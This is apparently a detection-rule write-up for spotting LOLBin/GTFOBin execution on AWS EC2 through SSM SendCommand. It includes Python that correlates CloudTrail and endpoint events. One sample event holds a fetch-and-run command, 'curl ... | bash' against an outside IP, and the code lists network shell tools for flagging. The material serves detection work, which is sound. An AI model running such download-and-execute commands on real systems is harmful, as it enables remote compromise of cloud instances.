
Summary
This detection rule, created by Elastic, identifies potentially malicious execution of Living Off the Land Binaries (LOLBins) or GTFOBins on AWS EC2 instances via the AWS Systems Manager (SSM) `SendCommand` API. The rule correlates AWS CloudTrail `SendCommand` events with endpoint process execution events by matching the SSM command ID, which recovers what was actually executed on the instance even though CloudTrail redacts the command parameters in the `SendCommand` record itself. This correlation matters because an adversary with SSM permissions can run commands on an instance without SSH or RDP access, using legitimate administrative tooling to exfiltrate data, open a reverse shell, or move laterally within the environment. Because the command ID is only visible on the endpoint side, the rule depends on process telemetry being collected from the instance; a `SendCommand` event alone cannot tell you what ran.
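The correlation the summary describes, as an added example in Python (this is illustrative code written for this page, not Elastic's rule logic or query). It joins a constructed CloudTrail `SendCommand` record, whose `parameters` field carries the `HIDDEN_DUE_TO_SECURITY_REASONS` placeholder that CloudTrail substitutes for `SendCommand` parameters, with constructed endpoint process events by extracting the SSM command ID from the process working directory. The ECS-like field names, the SSM orchestration directory layout under `/var/lib/amazon/ssm/`, the small GTFOBins list, and the `ssm-document-worker` parent name are assumptions; the sample events are constructed for this example.

```python
"""Correlate CloudTrail SSM SendCommand events with endpoint process events.

Added illustration for this page. Event shapes, the GTFOBins list and the
SSM orchestration path are assumptions, not the detection rule's own logic.
"""
import re
from typing import Dict, List, Optional

# Constructed CloudTrail record. CloudTrail redacts the request parameters of
# SendCommand; only the commandId in responseElements survives for correlation.
CLOUDTRAIL_RECORDS = [
    {
        "eventSource": "ssm.amazonaws.com",
        "eventName": "SendCommand",
        "userIdentity": {"arn": "arn:aws:iam::123456789012:user/dev-automation"},
        "requestParameters": {
            "documentName": "AWS-RunShellScript",
            "instanceIds": ["i-0abc1234def567890"],
            "parameters": "HIDDEN_DUE_TO_SECURITY_REASONS",
        },
        "responseElements": {
            "command": {"commandId": "3f2a1c9e-1111-2222-3333-444455556666"}
        },
    },
]

# Constructed endpoint process events in an ECS-like shape. Assumed layout: the
# SSM agent runs AWS-RunShellScript from an orchestration directory keyed by
# the command ID, so the ID shows up in process.working_directory.
PROCESS_EVENTS = [
    {
        "host": {"id": "i-0abc1234def567890"},
        "process": {
            "name": "bash",
            "args": ["/bin/bash", "-c", "curl http://198.51.100.7/x.sh | bash"],
            "parent": {"name": "ssm-document-worker"},
            "working_directory": (
                "/var/lib/amazon/ssm/i-0abc1234def567890/document/orchestration/"
                "3f2a1c9e-1111-2222-3333-444455556666/awsrunShellScript/0.awsrunShellScript"
            ),
        },
    },
    {   # benign: same binary family, but not launched through SSM
        "host": {"id": "i-0abc1234def567890"},
        "process": {
            "name": "curl",
            "args": ["curl", "https://example.com"],
            "parent": {"name": "cron"},
            "working_directory": "/root",
        },
    },
]

# Assumed, deliberately short list of binaries worth flagging when SSM runs them.
GTFOBINS = {"bash", "sh", "curl", "wget", "nc", "ncat", "python3", "perl", "socat", "base64"}
UUID_RE = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}")


def command_ids_from_cloudtrail(records: List[dict]) -> Dict[str, dict]:
    """Index SendCommand events by commandId, keeping who sent it and to where."""
    index = {}
    for rec in records:
        if rec.get("eventSource") != "ssm.amazonaws.com" or rec.get("eventName") != "SendCommand":
            continue
        cid = rec.get("responseElements", {}).get("command", {}).get("commandId")
        if not cid:
            continue
        params = rec.get("requestParameters", {})
        index[cid] = {
            "actor": rec.get("userIdentity", {}).get("arn"),
            "document": params.get("documentName"),
            "instance_ids": params.get("instanceIds", []),
            # The literal string is what CloudTrail writes instead of the real parameters.
            "parameters_redacted": isinstance(params.get("parameters"), str)
            and params["parameters"].startswith("HIDDEN"),
        }
    return index


def ssm_command_id(event: dict) -> Optional[str]:
    """Pull the SSM command ID out of the working directory or argv, if present."""
    proc = event.get("process", {})
    haystack = " ".join([proc.get("working_directory", ""), *proc.get("args", [])])
    match = UUID_RE.search(haystack)
    return match.group(0) if match else None


def correlate(records: List[dict], events: List[dict]) -> List[dict]:
    """Return one alert per GTFOBin process that maps back to a SendCommand event."""
    commands = command_ids_from_cloudtrail(records)
    alerts = []
    for ev in events:
        cid = ssm_command_id(ev)
        if cid is None or cid not in commands:
            continue
        proc = ev["process"]
        if proc.get("name") not in GTFOBINS:
            continue
        ctx = commands[cid]
        # If CloudTrail named explicit instances, the endpoint must be one of them.
        if ctx["instance_ids"] and ev.get("host", {}).get("id") not in ctx["instance_ids"]:
            continue
        alerts.append({
            "command_id": cid,
            "actor": ctx["actor"],
            "document": ctx["document"],
            "parameters_redacted": ctx["parameters_redacted"],
            "host": ev["host"]["id"],
            "process": proc["name"],
            "command_line": " ".join(proc.get("args", [])),
        })
    return alerts


if __name__ == "__main__":
    for alert in correlate(CLOUDTRAIL_RECORDS, PROCESS_EVENTS):
        print(alert)
```

The point of the join is the last field: the CloudTrail side tells you who called `SendCommand` and against which instances, the endpoint side tells you the command line that CloudTrail hid, and the command ID is the only key shared by both. The benign `curl` launched by cron carries no command ID and never reaches the GTFOBin check.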
Categories
- Cloud
- Endpoint
Data Sources
- Cloud Service
- Network Traffic
- Process
- User Account
- Application Log
ATT&CK Techniques
- T1651
- T1105
Created: 2025-11-23